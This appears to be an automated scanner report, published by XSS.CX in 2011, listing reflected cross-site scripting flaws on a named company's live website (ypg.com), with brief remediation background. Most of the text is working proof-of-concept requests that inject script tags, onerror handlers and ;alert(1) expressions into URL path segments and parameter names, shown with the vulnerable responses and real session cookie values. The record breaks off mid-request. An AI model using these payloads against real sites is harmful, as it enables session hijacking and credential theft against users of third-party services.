XSS, ypg.com, Cross Site Scripting, CWE-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Mon Apr 18 16:42:14 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. Cross-site scripting (reflected)

1.1. http://www.ypg.com/en [REST URL parameter 1]

1.2. http://www.ypg.com/en/ [REST URL parameter 1]

1.3. http://www.ypg.com/en/contact-us [REST URL parameter 1]

1.4. http://www.ypg.com/en/contact-us [REST URL parameter 2]

1.5. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]

1.6. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]

1.7. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]

1.8. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]

1.9. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

1.10. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]

1.11. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

1.12. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]

1.13. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [name of an arbitrarily supplied request parameter]

1.14. http://www.ypg.com/en/images/loading.gif [REST URL parameter 1]

1.15. http://www.ypg.com/en/images/loading.gif [REST URL parameter 2]

1.16. http://www.ypg.com/en/images/loading.gif [REST URL parameter 3]

1.17. http://www.ypg.com/en/images/loading.gif [name of an arbitrarily supplied request parameter]

1.18. http://www.ypg.com/images/imageresizer.php [REST URL parameter 1]

1.19. http://www.ypg.com/images/imageresizer.php [REST URL parameter 2]

1.20. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 1]

1.21. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 2]

1.22. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 3]

1.23. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico [REST URL parameter 4]

2. Session token in URL

2.1. http://www.ypg.com/en/

2.2. http://www.ypg.com/en/contact-us

2.3. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

2.4. http://www.ypg.com/en/images/loading.gif

3. Cookie without HttpOnly flag set

4. Email addresses disclosed

4.1. http://www.ypg.com/en/contact-us

4.2. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

4.3. http://www.ypg.com/en/images/loading.gif

4.4. http://www.ypg.com/js/jquery/plugins/jquery.cookie.js

5. Content type incorrectly stated

5.1. http://www.ypg.com/images/imageresizer.php

5.2. http://www.ypg.com/modules/core/front/images/ypg_16x16.ico



1. Cross-site scripting (reflected)  next
There are 23 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ypg.com/en [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c was submitted in the REST URL parameter 1. This input was echoed as 10219--><img src=a onerror=alert(1)>876ba4af52c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en10219--><img%20src%3da%20onerror%3dalert(1)>876ba4af52c HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=fh9u4r4ioujp1m5s1hok6imtu1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en10219--><img src=a onerror=alert(1)>876ba4af52c)
        </p>
...[SNIP]...

1.2. http://www.ypg.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6 was submitted in the REST URL parameter 1. This input was echoed as 20d27--><img src=a onerror=alert(1)>2a43138dda6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en20d27--><img%20src%3da%20onerror%3dalert(1)>2a43138dda6/ HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:22:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Set-Cookie: PHPSESSID=s8o0kouqh74u2emhbtb2k7omj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en20d27--><img src=a onerror=alert(1)>2a43138dda6)
        </p>
...[SNIP]...

1.3. http://www.ypg.com/en/contact-us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306 was submitted in the REST URL parameter 1. This input was echoed as b7f66--><img src=a onerror=alert(1)>ad5f6912306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /enb7f66--><img%20src%3da%20onerror%3dalert(1)>ad5f6912306/contact-us HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:29:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (enb7f66--><img src=a onerror=alert(1)>ad5f6912306)
        </p>
...[SNIP]...

1.4. http://www.ypg.com/en/contact-us [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 6b7ce--><script>alert(1)</script>d71bb51e7af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<pre>array(6) {
["lang"]=>
string(2) "en"
["url"]=>
string(55) "/contact-us6b7ce--><script>alert(1)</script>d71bb51e7af"
[3]=>
...[SNIP]...

1.5. http://www.ypg.com/en/contact-us [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdfd1'><script>alert(1)</script>22ec70f7aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
Referer: http://www.ypg.com/en/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.1.10.1303158160

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:28:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Yellow Pages Gro
...[SNIP]...
<a target="_blank" href='/en/contact-us?cdfd1'><script>alert(1)</script>22ec70f7aad=1?print=1'>
...[SNIP]...

1.6. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354 was submitted in the REST URL parameter 1. This input was echoed as 8bd59--><img src=a onerror=alert(1)>f48834a7354 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en8bd59--><img%20src%3da%20onerror%3dalert(1)>f48834a7354/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 20:30:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</b> Invalid controller specified (en8bd59--><img src=a onerror=alert(1)>f48834a7354)
        </p>
...[SNIP]...

1.7. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag. The payload c52da><script>alert(1)</script>1d3ad9b9a08 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3Cc52da><script>alert(1)</script>1d3ad9b9a08/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c52da><script>alert(1)</script>1d3ad9b9a08/style>
...[SNIP]...

1.8. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag. The payload c7754><script>alert(1)</script>db21f56eda7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3Cc7754><script>alert(1)</script>db21f56eda7/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:30:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<c7754><script>alert(1)</script>db21f56eda7/script>
...[SNIP]...

1.9. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the name of an HTML tag. The payload 754e1><script>alert(1)</script>4412e20be66 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/754e1><script>alert(1)</script>4412e20be66/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
</754e1><script>alert(1)</script>4412e20be66/script>
...[SNIP]...

1.10. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b17ae%3balert(1)//42d657bd22f was submitted in the REST URL parameter 4. This input was echoed as b17ae;alert(1)//42d657bd22f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3Cb17ae%3balert(1)//42d657bd22f/script%3E HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gkuma36biadk8alq14io7pdq22; __utmz=250291022.1303158160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250291022.593538181.1303158160.1303158160.1303158160.1; __utmc=250291022; __utmb=250291022.2.10.1303158160

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2011 20:31:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>404</title> <
...[SNIP]...
<b17ae;alert(1)//42d657bd22f/script>
...[SNIP]...

1.11. http://www.ypg.com/en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ypg.com
Path:   /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ea846%3balert(1)//f47b0af8e66 was submitted in the REST URL parameter 5. This input was echoed as ea846;alert(1)//f47b0af8e66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/contact-us%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000021)%3C/ea846%3balert(1)//f47b0af8e66 HTTP/1.1
Host: www.ypg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
